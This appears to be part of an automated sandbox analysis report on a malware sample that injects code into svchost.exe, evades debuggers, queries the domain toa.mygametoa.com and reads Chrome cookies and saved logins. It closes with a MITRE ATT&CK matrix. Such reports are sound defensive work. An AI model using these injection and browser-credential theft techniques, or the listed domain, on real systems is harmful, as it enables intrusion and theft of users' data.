Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3384AE3 FindFirstFileW,FindClose,17_2_00000204F3384AE3
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33849FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,17_2_00000204F33849FF
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3387A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,17_2_00000204F3387A20
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33857B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00000204F33857B0
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3385E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,17_2_00000204F3385E30
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F339AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,17_2_00000204F339AE60
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,13_2_04EC5C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,13_2_04EC8FD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EDEFAF mov eax, dword ptr fs:[00000030h] 13_2_04EDEFAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04D772D8 mov eax, dword ptr fs:[00000030h] 13_2_04D772D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04ED669F IsDebuggerPresent,OutputDebugStringW,13_2_04ED669F
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0FB804 GetLastError,IsDebuggerPresent,OutputDebugStringW,14_2_0000024B7D0FB804
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EBB540 UnmapViewOfFile,CreateFileMappingW,MapViewOfFile,GetProcessHeap,HeapFree,13_2_04EBB540
Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC1D00 SetEvent,InterlockedExchange,BlockInput,BlockInput,BlockInput,13_2_04EC1D00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EDE94C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_04EDE94C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04ED5AE6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_04ED5AE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04ED62AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_04ED62AE
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D103EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000024B7D103EBC
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0FA9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0000024B7D0FA9E0
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0FB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0000024B7D0FB324
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E1789B324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E1789B324
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E1789A9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0000012E1789A9E0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178A3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E178A3EBC
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E1980296C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E1980296C
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E19805788 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E19805788
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E198EB3D8 SetUnhandledExceptionFilter,16_2_0000012E198EB3D8
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E198D3648 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000012E198D3648
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E198D0824 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0000012E198D0824
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33AB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000204F33AB324
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33B3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00000204F33B3EBC

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\svchost.exe Domain query: toa.mygametoa.com
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24B7C9A0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 204F32C0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23341FB0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D91A370000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2F2C5B40000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 222CAA60000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 286215B0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1DC519A0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2216B180000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2743A260000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1111A940000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22F12130000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BE5BFA0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21C22B30000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 202B2180000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1AFBA0B0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\svchost.exe base: 25C96320000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC98E0 GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,WaitForSingleObject,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,13_2_04EC98E0
Creates a thread in another existing process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7C9A0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: F32C0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 41FB0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 1A370000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: C5B40000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: CAA60000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 215B0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 519A0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6B180000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 3A260000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 1A940000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 12130000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5BFA0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 22B30000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: B2180000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: BA0B0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: C:\Windows\System32\svchost.exe EIP: 96320000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: unknown EIP: 3F100000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: unknown EIP: 8E740000
Source: C:\Windows\SysWOW64\rundll32.exe Thread created: unknown EIP: CCE40000
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 24B7C9A0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 204F32C0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 23341FB0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 1D91A370000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 2F2C5B40000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 222CAA60000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 286215B0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 1DC519A0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 2216B180000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 2743A260000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 1111A940000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 22F12130000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE5BFA0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 21C22B30000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 202B2180000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFBA0B0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\svchost.exe base: 25C96320000
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\svchost.exe Thread register set: target process: 6944
Contains functionality to inject threads in other processes
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,13_2_04EC8FD0
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0EBC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,14_2_0000024B7D0EBC10
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E1788BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,16_2_0000012E1788BC10
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F339BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,17_2_00000204F339BC10
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\svchost.exe Thread register set: 6944 4D000
Source: C:\Windows\System32\svchost.exe Code function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,FindCloseChangeNotification,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,FindCloseChangeNotification,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService 14_2_0000024B7D0EC6B0
Source: C:\Windows\System32\svchost.exe Code function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService 16_2_0000012E1788C6B0
Source: C:\Windows\System32\svchost.exe Code function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService 17_2_00000204F339C6B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC2050 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,13_2_04EC2050
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_006A4AF0 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,11_2_006A4AF0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C6A5C AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,11_2_005C6A5C
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C78B8 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,11_2_005C78B8
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Progman
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,10_2_0040B044
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,10_2_0041E034
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,10_2_0041E080
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,10_2_004AF218
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_0040A4CC
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,11_2_0040E7F0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0040DC78
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: GetLocaleInfoW,11_2_0060FD58
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00405AE0 cpuid 10_2_00405AE0
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041C3D8 GetLocalTime,10_2_0041C3D8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198DEC74 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,16_2_0000012E198DEC74
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_00625580 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,11_2_00625580
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,10_2_004B5114
Source: svchost.exe, 00000026.00000000.409083058.0000025C96554000.00000004.00000001.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe

Stealing of Sensitive Information:

Yara detected Cookie Stealer
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.tmp
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\System32\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 16_2_0000012E19821D50
Source: C:\Windows\System32\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 16_2_0000012E19821D97

Remote Access Functionality:

Yara detected Cookie Stealer
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ECD7B0 htons,bind,bind,InterlockedIncrement,InterlockedIncrement,InterlockedIncrement,13_2_04ECD7B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ED2030 socket,bind,closesocket,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,13_2_04ED2030
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ED39E0 WSAGetLastError,socket,WSAGetLastError,WSAIoctl,WSAGetLastError,htons,bind,WSAGetLastError,13_2_04ED39E0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,14_2_0000024B7D0F8000
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,14_2_0000024B7D0F6260
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F0B90 htons,bind,14_2_0000024B7D0F0B90
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17896260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,16_2_0000012E17896260
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17898000 WSAGetLastError,socket,htons,bind,WSAGetLastError,16_2_0000012E17898000
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17890B90 htons,bind,16_2_0000012E17890B90
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F33A0B90 htons,bind,17_2_00000204F33A0B90
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F33A6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,17_2_00000204F33A6260
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F33A8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,17_2_00000204F33A8000

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Native API 1 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 1 | OS Credential Dumping 2 | System Time Discovery 2 | Replication Through Removable Media 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Replication Through Removable Media 1 | Service Execution 12 | Create Account 1 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | Peripheral Device Discovery 11 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Valid Accounts 1 | Valid Accounts 1 | Obfuscated Files or Information 21 | Credentials In Files 1 | System Service Discovery 1 | SMB/Windows Admin Shares | Input Capture 11 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Windows Service 11 | Access Token Manipulation 11 | Software Packing 21 | NTDS | File and Directory Discovery 3 | Distributed Component Object Model | Clipboard Data 2 | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Registry Run Keys / Startup Folder 1 | Windows Service 11 | DLL Side-Loading 1 | LSA Secrets | System Information Discovery 47 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Bootkit 1 | Process Injection 823 | File Deletion 1 | Cached Domain Credentials | Query Registry 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder 1 | Masquerading 122 | DCSync | Security Software Discovery 471 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts 1 | Proc Filesystem | Virtualization/Sandbox Evasion 131 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
